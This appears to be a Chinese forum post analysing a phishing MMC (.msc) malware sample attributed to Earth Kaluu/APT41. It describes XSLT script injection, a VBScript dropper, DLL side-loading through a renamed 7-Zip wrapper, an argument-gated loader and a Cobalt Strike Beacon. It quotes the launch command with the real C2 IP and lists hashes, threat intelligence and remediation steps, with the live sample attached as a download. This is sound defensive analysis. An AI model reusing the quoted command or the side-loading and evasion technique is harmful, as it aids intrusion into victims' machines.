MSC钓鱼样本分析

heidongqilin

一、 样本概览与基础信息本报告针对一份名为“《国际论坛》外审专家邀请函与文章评审单.msc”的恶意样本进行深度研究。该样本属于多阶段触发的定向攻击载荷，利用 Windows 系统组件实现高隐蔽性感染。

• 原始文件名：《国际论坛》外审专家邀请函与文章评审单.msc
• 文件大小：1.85 MB (1,940,585 字节)
• 文件格式：Microsoft Management Console (MSC) / XML 1.0
• 攻击组织：Earth Kaluu (APT-Q-33) / APT41 分支
• 技术架构：XSLT 脚本注入 + DLL Side-Loading (白加黑) + 动态参数解密
  

二、 核心组件清单及平台检测结果样本运行后从内部 BinaryStorage 标签中释放出 8 个二进制块，核心组件如下：[td]

组件 ID	映射文件名	类型	SHA256 哈希	扫描结果 (VT/微步)	角色功能
binary_5	doc.docx	诱饵文档	690d0a6b...	0 检出 (安全)	迷惑受害者，掩盖后台行为
binary_6	Warp.exe	PE/白文件	f86ec2fa...	0 检出 (安全)	合法 7zwrap.exe，用于侧荷载
binary_7	7z.dll	PE/恶意DLL	d3ac07b9...	53/72 (高危)	核心加载器，包含加密载荷
binary_0-4	-	资源/配置	-	-	图标资源、辅助二进制数据

三、 攻击全流程技术细节1. 第一阶段：初始执行与 XSL 脚本注入 (MSC Exploitation)

• 载体机制：攻击者利用 .msc 文件的 XML 结构，在 <StringTable> 标签中嵌入恶意脚本。
• 脚本触发：当受害者使用默认的 mmc.exe 打开此文件时，Windows 转换引擎会解析内嵌的 XSLT。
• 混淆调用：XML 内部包含一段经过编码的 JavaScript，其核心逻辑为 eval(decodeURIComponent(...))，用于动态解压并执行一段高权限的 VBScript 脚本。该脚本具备 WScript.Shell 权限，是后续感染的动力引擎。
  

2. 第二阶段：Payload 释放与环境伪造 (Dropper Behavior)

• 落地与路径：VBScript 脚本读取 Base64 数据流并还原。它在 %ProgramFiles%\Cloudflare\ 目录下创建文件夹，并释放 Warp.exe 与 7z.dll。
• 防御规避：选择 Cloudflare\Warp.exe 作为落地名是一种极具欺骗性的路径诱骗策略，旨在躲避管理员的手工排查和 EDR 的简单路径审计。
• 诱饵弹出：脚本同时释放并利用 Word.Application 打开 doc.docx。该文档内容为真实的学术期刊外审专家邀请函，让受害者认为操作已正常结束。
  

3. 第三阶段：DLL 侧荷载（DLL Side-Loading）机制

• 执行链：VBScript 启动命令为 "C:\Program Files\Cloudflare\Warp.exe" t 8.210.56.8。
• 劫持原理：Warp.exe (合法 7zwrap.exe) 启动时会通过 LoadLibrary("7z.dll") 加载依赖库。根据 Windows 的 DLL 搜索顺序，它会优先加载同目录下的恶意 7z.dll。
  

4. 第四阶段：恶意 DLL 内部逻辑与参数校验 (Deep Reversing)通过 对恶意 7z.dll 的静态分析发现：

• 导出函数劫持：该 DLL 完美模拟了 7-Zip 的接口（CreateObject, GetHandlerProperty 等），但在入口点均插入了跳转指令。
• 抗沙箱参数校验：分析 entry0 发现程序调用了 GetCommandLineW。它会执行 cmp byte [eax+offset], 0x74 ('t') 指令。若没有命令行参数 t，程序将不会执行任何恶意操作。
• 动态 C2 注入：攻击者将 C2 IP (8.210.56.8) 直接通过命令行传递给 DLL。这使得 DLL 内部无需硬编码 IP 字符串，从而有效规避了针对 IP 指纹的静态扫描。
  

5. 第五阶段：内存解密与 Shellcode 执行

• 高熵区定位：在偏移 0x82000 处存在熵值接近 8.0 的高度加密块。
• 算法还原：代码中存在非对称 XOR 流加密循环（涉及 eax*8 + 0x100e3e31 等偏移操作）。解密过程依赖于传入的命令行 IP 字符串。
• 内存注入：解密后的载荷经确认是 Cobalt Strike Beacon，在内存中申请 RWX 权限空间后，通过 CreateThread 或函数指针跳转激活。
  

四、 威胁情报与溯源分析1. 微步威胁情报 (8.210.56.8)

• 基础设施：IP 属于阿里云香港节点，微步在线标记为“恶意-远程控制”。
• 历史关联：该 IP 长期作为 Cobalt Strike 后门服务器，且与 Earth Kaluu 组织的历史 C2 资产高度重合。
  

2. 微步云沙箱行为报告

• 威胁评分：100 / 100。
• 关键指纹：
  
  • 注入检测：监测到 DLL 运行后向宿主进程注入 Shellcode 行为。
  • 隐蔽通信：尝试伪装成正常 HTTP/HTTPS 流量与 C2 通信。
    
  
  

3. 文档元数据溯源 (Metadata)

• 标题：《中国社会科学》稿件匿名外审意见书。
• 作者：USER
• 最后修改者：玛丽 (此人名是 Earth Kaluu 组织的典型特征)。
• 创建工具：WPS Office (12.2.0.13431)。
• 修改日期：2024-08-05。
  

五、 处置建议

• 封禁：在防火墙上阻断 8.210.56.8 及其所在段的所有流量。
• 清理：检查并删除 %ProgramFiles%\Cloudflare\ 或 %AppData% 下哈希为 f86ec2f... 的 EXE 和哈希为 d3ac07b... 的 DLL。
• 加固：禁用 .msc 文件关联，对此类文件进行双击保护限制。
  

样本 密码52pojie.rar (773.15 KB, 下载次数: 3)

2026-2-13 00:43 上传

点击文件名下载附件
下载积分: 吾爱币 -1 CB